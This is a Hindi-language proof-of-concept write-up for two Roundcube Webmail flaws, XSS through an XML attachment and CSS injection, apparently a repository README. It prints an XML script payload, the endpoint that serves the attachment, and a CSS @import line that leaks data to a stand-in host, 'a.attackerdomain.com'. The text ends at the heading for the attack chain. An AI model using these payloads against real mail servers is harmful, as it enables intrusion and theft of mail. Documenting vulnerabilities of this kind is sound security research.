
Roundcube भेद्यताओं CVE-2024-42008 और CVE-2024-42010 के लिए PoC
यह प्रूफ ऑफ कॉन्सेप्ट (PoC) Roundcube Webmail में दो कमजोरियों के शोषण को प्रदर्शित करता है जो CSS इंजेक्शन और क्रॉस-साइट स्क्रिप्टिंग (XSS) को सक्षम बनाती हैं। इस हमले में दो चरण शामिल हैं:
दुर्भावनापूर्ण XML अनुलग्नक के माध्यम से XSS (CVE-2024-42008)
अपर्याप्त फ़ाइल अपलोड जाँचों के कारण, JavaScript कोड के साथ एक XML फ़ाइल को अनुलग्नक के रूप में भेजा जा सकता है, उदाहरण के लिए
<something:script xmlns:something="<http://www.w3.org/1999/xhtml>">
alert(origin)
</something:script>
यह एक ज्ञात समस्या थी, जिसे CVE-2020-13965 के रूप में ट्रैक किया गया था, और इसका शमन "Open attachment" विकल्प को अक्षम करना था। लेकिन फ़ाइल अभी भी इस एंडपॉइंट के माध्यम से एक्सेस की जा सकती है
https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
जहाँ UID इस विशेष मेलबॉक्स (यानी INBOX) में इस विशेष अनुलग्नक के लिए अद्वितीय पहचानकर्ता है।

CSS इंजेक्शन के माध्यम से HTML एक्सफिल्ट्रेशन (CVE-2024-42010)
ईमेल भेजते समय, अपनी स्वयं की CSS फ़ाइल को इंजेक्ट करना संभव है, जब उसे a से शुरू होने वाले डोमेन पर होस्ट किया जाता है। उसके माध्यम से और एक JavaScript सर्वर फ़ाइल के माध्यम से, जो कमजोर Roundcube होस्ट द्वारा किए गए अनुरोधों को संसाधित करती है, दुर्भावनापूर्ण XSS अनुलग्नक का UID निकालना संभव है।
भेजे गए ईमेल में CSS को इस प्रकार इम्पोर्ट करें
<style>
@import "//a.attackerdomain.com/start?"
</style>
JS सर्वर (roundcube-css-exploit.js) को होस्ट करें जो दुर्भावनापूर्ण अनुलग्नक के UID को एक्सफिल्ट्रेट करता है

हमले की श्रृंखला